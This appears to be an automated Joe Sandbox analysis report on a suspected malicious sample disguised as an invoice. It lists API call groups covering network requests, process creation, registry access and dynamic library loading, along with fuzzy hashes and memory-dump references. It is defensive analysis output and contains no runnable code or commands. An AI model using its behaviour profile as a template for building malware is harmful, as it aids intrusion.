                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 2358735015-567219261
                                                              • Opcode ID: 38aad16d5e4f279c84f8a688abb61809c1ed9d201aa0d439f868eb1f4e9e00a4
                                                              • Instruction ID: 4a7291e0fed163bd0e899dade9d92fb58b728d560c29d4d9d29412c13efb2ce1
                                                              • Opcode Fuzzy Hash: 38aad16d5e4f279c84f8a688abb61809c1ed9d201aa0d439f868eb1f4e9e00a4
                                                              • Instruction Fuzzy Hash: E031947052021AAFCF00EF54CD819FEB3B8FF55314B104629E825A76D1DB71E925CB90
                                                              APIs
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0022B88E
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0022B8A1
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 0022B8D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 912ba7bd7b969dfcb4cc480661b63734d2fa8aa833e94c54244456ed637c3ed9
                                                              • Instruction ID: e37b742681ffe81705d2aa54770817d221a8b5c59313612ff66daad112174400
                                                              • Opcode Fuzzy Hash: 912ba7bd7b969dfcb4cc480661b63734d2fa8aa833e94c54244456ed637c3ed9
                                                              • Instruction Fuzzy Hash: C82143B6910108BFDB04AFA4EC8ADFE777CDF42350B504129F129A31E1DB740D2A9B60
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00244401
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00244427
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00244457
                                                              • InternetCloseHandle.WININET(00000000), ref: 0024449E
                                                                • Part of subcall function 00245052: GetLastError.KERNEL32(?,?,002443CC,00000000,00000000,00000001), ref: 00245067
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 1951874230-3916222277
                                                              • Opcode ID: 0c69c05d4d0fdfc2d9858101551c0a46bc5174d9df3de987acdbcdf46c8af775
                                                              • Instruction ID: 8b987b04dd64b5c2ab208092653e0ce8fd050f26d60120c9abfe41a22cf4fa1a
                                                              • Opcode Fuzzy Hash: 0c69c05d4d0fdfc2d9858101551c0a46bc5174d9df3de987acdbcdf46c8af775
                                                              • Instruction Fuzzy Hash: 6B218EB6610608BFE719AF64DC85FBFB6FCEF48758F10801AF109A2140EA648D559B70
                                                              APIs
                                                                • Part of subcall function 0020D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0020D1BA
                                                                • Part of subcall function 0020D17C: GetStockObject.GDI32(00000011), ref: 0020D1CE
                                                                • Part of subcall function 0020D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0020D1D8
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0025915C
                                                              • LoadLibraryW.KERNEL32(?), ref: 00259163
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00259178
                                                              • DestroyWindow.USER32(?), ref: 00259180
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              • Opcode ID: f9407c117bcadc24811800fd531b896725e5d15dbbe93713968851f5faf0328e
                                                              • Instruction ID: 3defc63842545f3c6cb777c701ecb020c2085be29c940af7e0a8fca893046a31
                                                              • Opcode Fuzzy Hash: f9407c117bcadc24811800fd531b896725e5d15dbbe93713968851f5faf0328e
                                                              • Instruction Fuzzy Hash: A821DE71220617FBEF104F649C88EBB33ADEF99365F108618FD1892190C771CCA5AB64
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00239588
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002395B9
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 002395CB
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00239605
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: ac5d67b79cd7dfc09b163c69369ff9eeb653e628862b63287df226be4293ef27
                                                              • Instruction ID: 7554f3ccb293c25d052d0f17b455a703f4fd7a8e1205489b4978999c8bf70158
                                                              • Opcode Fuzzy Hash: ac5d67b79cd7dfc09b163c69369ff9eeb653e628862b63287df226be4293ef27
                                                              • Instruction Fuzzy Hash: 5F21B2B0510206AFEB219F29DC05A9A77F8AF46720F604A19FDA5D72D0D7B0D9E1CB10
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00239653
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00239683
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00239694
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002396CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: 13d4ae76e4190edc34d054268ab7da3c0166ca6a68b60e042a793117096e195d
                                                              • Instruction ID: 18e14fed8328c0dd843b3a4ba7e0a4aa7df34f64a85499e1c141f0647113165d
                                                              • Opcode Fuzzy Hash: 13d4ae76e4190edc34d054268ab7da3c0166ca6a68b60e042a793117096e195d
                                                              • Instruction Fuzzy Hash: 8121A4B15212069BDB209F699C06E9A77FCAF46720F200A19FCA1D32D0D7F098E1CF10
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0023DB0A
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0023DB5E
                                                              • __swprintf.LIBCMT ref: 0023DB77
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0028DC00), ref: 0023DBB5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                              • String ID: %lu
                                                              • API String ID: 3164766367-685833217
                                                              • Opcode ID: 583d2bf8d5daf61e0cb165c5e83866b4e5f96ce20495ad7ee4cfb8e55c5f6aa3
                                                              • Instruction ID: 9dd2a31da914a4e6d58d7567f107635e59ea1603846b387cf82dd5be021d837f
                                                              • Opcode Fuzzy Hash: 583d2bf8d5daf61e0cb165c5e83866b4e5f96ce20495ad7ee4cfb8e55c5f6aa3
                                                              • Instruction Fuzzy Hash: 2421837560010CAFCB10EFA4DD85DEEB7B8EF49704B104069FA09E7251DB70EA51DB60
                                                              APIs
                                                                • Part of subcall function 0022C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0022C84A
                                                                • Part of subcall function 0022C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0022C85D
                                                                • Part of subcall function 0022C82D: GetCurrentThreadId.KERNEL32 ref: 0022C864
                                                                • Part of subcall function 0022C82D: AttachThreadInput.USER32(00000000), ref: 0022C86B
                                                              • GetFocus.USER32 ref: 0022CA05
                                                                • Part of subcall function 0022C876: GetParent.USER32(?), ref: 0022C884
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0022CA4E
                                                              • EnumChildWindows.USER32(?,0022CAC4), ref: 0022CA76
                                                              • __swprintf.LIBCMT ref: 0022CA90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                              • String ID: %s%d
                                                              • API String ID: 3187004680-1110647743
                                                              • Opcode ID: ac06a90187952c8f967aa970b821a76d3b5de2df123b43d22f05c3b0b67cc17b
                                                              • Instruction ID: abff0249e3fa11b3758e5ccb477db0e8d96f3e616b3430c9c657d98a604435f4
                                                              • Opcode Fuzzy Hash: ac06a90187952c8f967aa970b821a76d3b5de2df123b43d22f05c3b0b67cc17b
                                                              • Instruction Fuzzy Hash: 1411D3B5610219BBCF01BFA0AC89FED377CAF55704F108066FE08AA182DBB09955CB71
                                                              APIs
                                                              • __lock.LIBCMT ref: 00217AD8
                                                                • Part of subcall function 00217CF4: __mtinitlocknum.LIBCMT ref: 00217D06
                                                                • Part of subcall function 00217CF4: EnterCriticalSection.KERNEL32(00000000,?,00217ADD,0000000D), ref: 00217D1F
                                                              • InterlockedIncrement.KERNEL32(?), ref: 00217AE5
                                                              • __lock.LIBCMT ref: 00217AF9
                                                              • ___addlocaleref.LIBCMT ref: 00217B17
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                              • String ID: `'
                                                              • API String ID: 1687444384-3949923725
                                                              • Opcode ID: 1ec8ce98ee36e6d234e9cb2d2afcc2837122d38ee2c6e00098ade445b1e11c35
                                                              • Instruction ID: 22289c958620ab467b6a3be279e7830f6e51488f7d3e603784dbb872d82c65b4
                                                              • Opcode Fuzzy Hash: 1ec8ce98ee36e6d234e9cb2d2afcc2837122d38ee2c6e00098ade445b1e11c35
                                                              • Instruction Fuzzy Hash: CD016D71414B009FD720DF75D90978AF7F0AFA4325F20894EA49A976A0CB70A694CF51
                                                              APIs
                                                              • _memset.LIBCMT ref: 0025E33D
                                                              • _memset.LIBCMT ref: 0025E34C
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002B3D00,002B3D44), ref: 0025E37B
                                                              • CloseHandle.KERNEL32 ref: 0025E38D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseCreateHandleProcess
                                                              • String ID: D=+
                                                              • API String ID: 3277943733-1317424624
                                                              • Opcode ID: 9c6fd2e09c5612c8c97fd37fd76fd702c865cd7762c1d159e7ad5c178a203cd9
                                                              • Instruction ID: 55092c007ee9b156f0baacb632a02909b5bf065b94e06222b67dacb2cf525682
                                                              • Opcode Fuzzy Hash: 9c6fd2e09c5612c8c97fd37fd76fd702c865cd7762c1d159e7ad5c178a203cd9
                                                              • Instruction Fuzzy Hash: BFF082F1550306BEE3109B60BC59FBB7EACDB04B54F004921FE08D61A2D3759E608AA8
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002519F3
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00251A26
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00251B49
                                                              • CloseHandle.KERNEL32(?), ref: 00251BBF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              • Opcode ID: 955a7a4f7256c36e38ead24f0943daf25414a3b55a355620e79f39815dc804ed
                                                              • Instruction ID: 4074154461cac3491d238debb55015779976fe5c265aa5e017cfbebcd2058fda
                                                              • Opcode Fuzzy Hash: 955a7a4f7256c36e38ead24f0943daf25414a3b55a355620e79f39815dc804ed
                                                              • Instruction Fuzzy Hash: 9E816F70610305ABDF10AF64C886BADBBE5BF08724F14845AF905AF3C2D7B4A9658F94
                                                              APIs
                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0025E1D5
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0025E20D
                                                              • IsDlgButtonChecked.USER32(?,00000001), ref: 0025E248
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0025E269
                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0025E281
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ButtonCheckedLongWindow
                                                              • String ID:
                                                              • API String ID: 3188977179-0
                                                              • Opcode ID: 87ed4a4d5482d4fc6e02326d550da875a1ebd6335e1c1f7f990309b7abe57c6a
                                                              • Instruction ID: 381b9332c01cbf6ea59c56a57b10c33677cf356c41dcddd8d160a1a06addd893
                                                              • Opcode Fuzzy Hash: 87ed4a4d5482d4fc6e02326d550da875a1ebd6335e1c1f7f990309b7abe57c6a
                                                              • Instruction Fuzzy Hash: 1661E134620605AFDF28CF18C894FBA77BAEF49301F168059FD59A7291C770AE68CB14
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00231CB4
                                                              • VariantClear.OLEAUT32(00000013), ref: 00231D26
                                                              • VariantClear.OLEAUT32(00000000), ref: 00231D81
                                                              • VariantClear.OLEAUT32(?), ref: 00231DF8
                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00231E26
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$Clear$ChangeInitType
                                                              • String ID:
                                                              • API String ID: 4136290138-0
                                                              • Opcode ID: bd5674a6309a378f845fe0f1474f11fa2d2f3833dbe53b2a0b812e2853f12c60
                                                              • Instruction ID: 7b7246c5c5b588a90417c80dc59dc2a65ea1cebce5f82f6dab284c26c0c3caa6
                                                              • Opcode Fuzzy Hash: bd5674a6309a378f845fe0f1474f11fa2d2f3833dbe53b2a0b812e2853f12c60
                                                              • Instruction Fuzzy Hash: A35147B5A10209AFDB14CF58C884AAAB7B8FF4D314F158559ED59DB301E730EA61CFA0
                                                              APIs
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 002506EE
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0025077D
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0025079B
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 002507E1
                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 002507FB
                                                                • Part of subcall function 0020E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0023A574,?,?,00000000,00000008), ref: 0020E675
                                                                • Part of subcall function 0020E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0023A574,?,?,00000000,00000008), ref: 0020E699
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 327935632-0
                                                              • Opcode ID: b9b05d749fbf92127895aee004be41fcd90d14927fb19e737b52f1f554741e5d
                                                              • Instruction ID: 9cb11efcd09ca1e598bb61038af9dbab1360174da9c3225c9f7bc7dfbf78ea5a
                                                              • Opcode Fuzzy Hash: b9b05d749fbf92127895aee004be41fcd90d14927fb19e737b52f1f554741e5d
                                                              • Instruction Fuzzy Hash: 01514A75A1020ADFCB00EFA8D895DADF7B5BF58310B148055EA19AB352DB30ED55CF84
                                                              APIs
                                                                • Part of subcall function 00253C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00252BB5,?,?), ref: 00253C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00252EEF
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00252F2E
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00252F75
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00252FA1
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00252FAE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                              • String ID:
                                                              • API String ID: 3740051246-0
                                                              • Opcode ID: ea0f124e6430123bb42d7f7071610a849dd66cc15d7fe894620527956bc617a6
                                                              • Instruction ID: 8ce349033bd922fdd62275521d8043e2c00fef93db0abff5ac81e0d2f7d6d22d
                                                              • Opcode Fuzzy Hash: ea0f124e6430123bb42d7f7071610a849dd66cc15d7fe894620527956bc617a6
                                                              • Instruction Fuzzy Hash: E7516A71218208AFC704EF64D881E7AB7F9FF88304F04491DFA95972A1DB70E919CB92
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3819c1cd5aee258c26b113a3104175807b1a48a087431c61437c28d7f0f793dc
                                                              • Instruction ID: d68b6b9b68d36553c7d20b016f95d4adda76914c80a3d4cbdb433004d24a79a8
                                                              • Opcode Fuzzy Hash: 3819c1cd5aee258c26b113a3104175807b1a48a087431c61437c28d7f0f793dc
                                                              • Instruction Fuzzy Hash: BE411739921305AFC714DF28CC49FA9BB78EB09311F240225FD59E72D1E770AD65CA98
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002412B4
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002412DD
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0024131C
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
